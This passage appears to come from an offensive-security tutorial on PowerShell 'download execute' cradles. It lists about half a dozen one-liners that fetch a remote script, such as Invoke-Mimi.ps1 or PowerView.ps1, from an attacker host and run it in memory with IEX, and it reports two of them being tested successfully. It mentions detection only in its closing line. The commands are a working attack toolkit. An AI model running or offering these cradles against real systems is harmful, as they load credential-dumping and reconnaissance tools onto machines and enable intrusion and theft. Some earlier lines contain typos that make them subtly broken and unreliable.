In this section, we will discuss some Download Execute techniques.
IEX (New-Object System.Net.WebClient).DownloadString("<http://172.16.100.22/Invoke-Mimi.ps1>")
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate("<http://10.0.2.15/PowerView.ps1>");sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();IEX $response
IEX(IWR "<http://IP/File.ps1>")
$h=New-Object -ComObject Msxml2;$h.open("GET","<http://IP/File.ps1>",$false);$h.send();IEX $h.responseText
$wr=[System.Net.WebRequest]::Create("<http://IP/File.ps1>");$r=$wr.GetResponse();IEX([System.IO.StreamReader]($r.GetResposeStream())).ReadtoEnd()
Now, Let’s test this commands
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open("GET","<http://10.0.2.15/PowerView.ps1>",$false);$h.send();IEX $h.responseText
Notice that worked just fine.
$wr=[System.Net.WebRequest]::Create("<http://10.0.2.15/PowerView.ps1>");$r=$wr.GetResponse();IEX([System.IO.StreamReader]($r.GetResponseStream())).ReadtoEnd()
Okay nice.
Now, let’s take a look at some PowerShell Detections
